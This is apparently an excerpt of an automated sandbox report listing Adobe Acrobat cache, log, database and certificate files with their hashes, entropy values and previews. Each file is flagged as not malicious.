                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:modified
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.972695042269216
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqOsBdOg2Hprcaq3QYiubcP7E4TX:Y2sRdsidMHw3QYhbA7n7
                                                                                      MD5:3033D830A4FE40E7EE6DBAC65498FA99
                                                                                      SHA1:B0967DCBE5E7278A997438C1B5C2EBA6E306E368
                                                                                      SHA-256:35AAD99EC7DD1D2329F76DD699EF940E707D2377377DF2F1562A504FEE307507
                                                                                      SHA-512:A026B5CDD2F28E5F1E83CCCE18B7B7AFD4D07697747C6B379DF2141C79CC68CD983815930F6F738ADC4C15B73E57E1A74228D76AA8E31DB85AB932D9CCA24F87
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168895064293","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":851230},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5449
                                                                                      Entropy (8bit):5.250884908057755
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7dtxaZ:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhg
                                                                                      MD5:19E53A77335F42463917D11ECCE922B8
                                                                                      SHA1:BB92EA2423152B53899D5DC35AB47B37D94BE843
                                                                                      SHA-256:A89286BB9B7C685AB71633CEDAAE9CB3121F12A21A13959B15A2F71D5EF1ABB0
                                                                                      SHA-512:7029AC327E7CF1D64349DB48F2526372B2B549C0D12B3C41679129C37D860495C8D5DD8C143CFD6130FD0289391ED70663470038DB4D57F184E2C5B00664E3A6
                                                                                      Malicious:false
                                                                                      Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):327
                                                                                      Entropy (8bit):5.2203563815732
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D59+q2PN72nKuAl9OmbzNMxIFUt8ODmO3JZmw+OD+gtVkwON72nKuAl9OmbzNMT:7D54vVaHAa8jFUt8ODxJ/+ODpT5OaHAo
                                                                                      MD5:7F1F2348E22B2773D33BC19B54D93BD1
                                                                                      SHA1:C36E952B4929E17C9F1A7216E47F8E2912B65B1B
                                                                                      SHA-256:8AFD3051AD60C482D07D90E3421196E2C3E5110DB2A6C5F1BF5892A464BB5096
                                                                                      SHA-512:1EA850C37C843E02935D0D22A029830536B55B94FB36A2DD8EA80546E5D1EBAC5A5F9835C1410E364DDDE9DF003084967188B8A44306E94E38C98B28F1F12DA3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:03.251 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:03.273 d38 Recovering log #3.2024/12/19-06:48:03.286 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):327
                                                                                      Entropy (8bit):5.2203563815732
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D59+q2PN72nKuAl9OmbzNMxIFUt8ODmO3JZmw+OD+gtVkwON72nKuAl9OmbzNMT:7D54vVaHAa8jFUt8ODxJ/+ODpT5OaHAo
                                                                                      MD5:7F1F2348E22B2773D33BC19B54D93BD1
                                                                                      SHA1:C36E952B4929E17C9F1A7216E47F8E2912B65B1B
                                                                                      SHA-256:8AFD3051AD60C482D07D90E3421196E2C3E5110DB2A6C5F1BF5892A464BB5096
                                                                                      SHA-512:1EA850C37C843E02935D0D22A029830536B55B94FB36A2DD8EA80546E5D1EBAC5A5F9835C1410E364DDDE9DF003084967188B8A44306E94E38C98B28F1F12DA3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:03.251 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:03.273 d38 Recovering log #3.2024/12/19-06:48:03.286 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):65110
                                                                                      Entropy (8bit):0.6376462682686903
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                      MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                      SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                      SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                      SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                      Malicious:false
                                                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):4.445094548792511
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:ye6ci5txiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mCs3OazzU89UTTgUL
                                                                                      MD5:B42B4D7AFB2F8F9D1C273CE8B9DF4652
                                                                                      SHA1:9CF3345049BFDC964C9CC4CFABF26669C82F738F
                                                                                      SHA-256:F5FA53A83775021D11BBA83B822C8705306ACED1225FAF557C35ED2F4079AC1E
                                                                                      SHA-512:2706C26A36E2076F54AF665E7FD6CADEEDF33229927E9ABB6B213A87D9A0227F8B6A1E5E8893FB67289F14F4703F4D346F7480812BFDAD52D2C51133CFDB4689
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):3.76860070793156
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7MGJioyV1ioyxoy1C7oy16oy1TKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1OH:7ZJu1jeXjBikb9IVXEBodRBkZ
                                                                                      MD5:52CFA7BA506D4BCB2F1E714756A4A127
                                                                                      SHA1:736401759BC07FAA747ED84F2CB9123103C8C44E
                                                                                      SHA-256:CD2AE4A19F306050E39FBD48E72082F1F6983F6A5FB3736A569D046B12BBBFDD
                                                                                      SHA-512:82807A176FE3190BBFC796E8F052626E47111FE50733931622E61BA363F7E17C33650E056A468205B6DF26DD597D58E77597205D9D66FA4696814C74F486979B
                                                                                      Malicious:false
                                                                                      Preview:.... .c......h.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Certificate, Version=3
                                                                                      Category:dropped
                                                                                      Size (bytes):1391
                                                                                      Entropy (8bit):7.705940075877404
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                      Malicious:false
                                                                                      Preview:
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.7569015731729736
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFkl92OxfllXlE/HT8k6lrtNNX8RolJuRdxLlGB9lQRYwpDdt:kK5BT8jNMa8RdWBwRd
                                                                                      MD5:FADB57F478242874AB288724FBE0CBBA
                                                                                      SHA1:143205F56CE1A7BE92008B8A73C46A7118370639
                                                                                      SHA-256:A49F22345A9506D53859AEA1D7E8F61F717564714A8C18730F240348E3821642
                                                                                      SHA-512:4715D7199B5249A9015B5CA5D8E2C1911F05B029A9FF2531D127113F98F5E13CF7B881C7584A43EF2A67D46326A422DDA51D2BFD6903AF114807E620AD967B5B
                                                                                      Malicious:false
                                                                                      Preview:p...... .........K\..R..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.140290524202369
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKTD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:LaDnLNkPlE99SNxAhUe/3
                                                                                      MD5:6E1568317F74D34F329DB7586F8EEA09
                                                                                      SHA1:544808B5180B160F6E14982143A203BF54816456
                                                                                      SHA-256:C4D102BC3074E8FBB83A24A3399A662980B3DE0A1D71CFD9C630B670E7FB5B7E
                                                                                      SHA-512:42110ECCC594654FC8260D03514A6BF2567DFF04806FDDC3A0218773784DD9DF78AF7E0FDE8F90A28D6AB7160F06965466635C961846B8EF56D2D041D583B800
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........w..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.373157594414395
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJM3g98kUwPeUkwRe9:YvXKX1fmcgc5GMbLUkee9
                                                                                      MD5:E34878CE5BD1B6DF5B74CD742BE8310A
                                                                                      SHA1:E8E1428B92AD815003E58C579FCF537443BD3DAE
                                                                                      SHA-256:C3DF41E16B71566BE15B52C2F3462D41940AE8B4D2A5F2693B65AD4DFBDD67A7
                                                                                      SHA-512:00CF6080A8932A2ABF5278E80462C2EFA3C677FD1DF03D4618CA701AA70A533B18F2B421D173EEA9F481E5F995549CABCFF48DF9F7C6227483C99E9D7CFDFA5D
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.3269204112780555
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfBoTfXpnrPeUkwRe9:YvXKX1fmcgc5GWTfXcUkee9
                                                                                      MD5:856F1E51C25934DA14FD770850182276
                                                                                      SHA1:F25226B27C8E066EA837A3DBCD18533623123FA2
                                                                                      SHA-256:C48535AAAFFB031AFAA8A83647C221EE818ABBF191C9882AD8FE6EAC992DA327
                                                                                      SHA-512:1DFD23117C0978D7BC091499BD084B9EB649152F13260934BB1768ADB1196E9921752157A51A47F4BEE35F055824C6F3B8FE5190AB7D2B41867C30E9F8C7689A
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.305319730146486
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfBD2G6UpnrPeUkwRe9:YvXKX1fmcgc5GR22cUkee9
                                                                                      MD5:A0AB18DBD5A42379B27968EFEB24A31C
                                                                                      SHA1:2B901DD64C94DEEEA00788228F7251DED0D55E3B
                                                                                      SHA-256:01017267234F67583E88363809D1565FD650E3906933CB10A3EA36442D6BC8C3
                                                                                      SHA-512:45F140AEFBBA37ADB5BA3981FF2817651562562B4C02D5AA42C23970B03C20DC739FE7D5C6B98C9E965FD36901C3943DF06B6DC0B60826CA3ED11630FB31BD59
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.353523826502795
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfPmwrPeUkwRe9:YvXKX1fmcgc5GH56Ukee9
                                                                                      MD5:C6010DE6A9C83F25D6C631D31A0C4EB2
                                                                                      SHA1:189AF0ACD6CF824DD40A971D6D784F7DD10EDC50
                                                                                      SHA-256:A8870A0363FF8461246DD335DCCDF66FDF289BB4B1C0ED75D3E24BF0EC5A34ED
                                                                                      SHA-512:6F2489DD324479A2AD4B9EA0B6B53DB3E1B87FBDD88CA7B86FF2E080D40B1F8A6CDE4F28899AC109B8F15D0C322FC494F6E0B95942B43E08029850F474E29E41
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.691632891597947
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6X1fbEpLgE9cQx8LennAvzBvkn0RCmK8czOCCSTr:Yvrhgy6SAFv5Ah8cv/X
                                                                                      MD5:104BB5677C6699B062E56E7878DD8207
                                                                                      SHA1:C457658D4D01353A589F356F8D288AEA96580882
                                                                                      SHA-256:7EE8B62E385904AC9EA42B3CC7529857F660AD8263ADCF0F0A87E2AFF67DC825
                                                                                      SHA-512:5FF2CBEC7C8AF44C01772848BE05372AE6C9207426316AB13BE5084BEEA1032245FB375AC32379882F38E4C10C8D9CEB6A2758CAE0950B877F7DDF66FC6C83A7
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.304351151046977
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf8dPeUkwRe9:YvXKX1fmcgc5GU8Ukee9
                                                                                      MD5:621553807F2FEE77C01BD871968981A7
                                                                                      SHA1:08EA23D4843B19A4C9225B297B1E3B42913A867E
                                                                                      SHA-256:6D701B17D2366E5928D86830FCAEDE15270C26D0B307F025FEF73986FE6EC7D6
                                                                                      SHA-512:7E811D5624BA5340C74CB0A344C9062CFC4802A32C2466517395E46285FC22B5953672354FCED9EBE19E7C6967943F2B2C8F505369E70D184C45AFE9A6B59DB8
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.3078492957553625
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfQ1rPeUkwRe9:YvXKX1fmcgc5GY16Ukee9
                                                                                      MD5:BAB31D7273062CF5E64F77664BDB7898
                                                                                      SHA1:F1DE1EB3D0760114F74984B8C67BED1901AAEFD5
                                                                                      SHA-256:BDB7C7EC519519222B5546B2749D014C1F9FD6B1F933758AD5BBB7ED29579F13
                                                                                      SHA-512:B26DD2A6AC55760E4491745C5C6EC799897ED574A7A9FA7A300F07428C67F12B4550CE3E5A889ECB2F5FC33F1699D5C91DC1FBA921F571F5944C01C8B5DE8337
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.314335651955779
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfFldPeUkwRe9:YvXKX1fmcgc5Gz8Ukee9
                                                                                      MD5:73E91259E23A28272B2C49594544C535
                                                                                      SHA1:81FFE15014ACC6C1A21F3E53F7352B7BACF3000B
                                                                                      SHA-256:7835651E4661B80F1A883DEACF229D5E701DAE922083CBA4382382D602891DB1
                                                                                      SHA-512:C330F8DD16EFFD0496BAE7E20F4042852CB5864D014508DCD084778034804A05C9213D2C728AED7C4B5768A7DCC112828CF1212CB245438A77E2F9A7489E9D1E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.330771215637848
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfzdPeUkwRe9:YvXKX1fmcgc5Gb8Ukee9
                                                                                      MD5:1FD5A8A3FA8204BA8C320949C8CA8FD4
                                                                                      SHA1:443B832D5C99D327EFB440B23953CCD484EF1E1B
                                                                                      SHA-256:4D3122C19A66E39D94FFD5C91C7D115D5ED87E8244AC26C82F13EE9CB63EFA32
                                                                                      SHA-512:87BDFA91A381B886354E722FBCAE127CD6714E1A23016F93674E7E0D25E5FE6AF3077D5F3E109819143A60E795F08913F59C90D461CA4808478A479166DB8C07
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
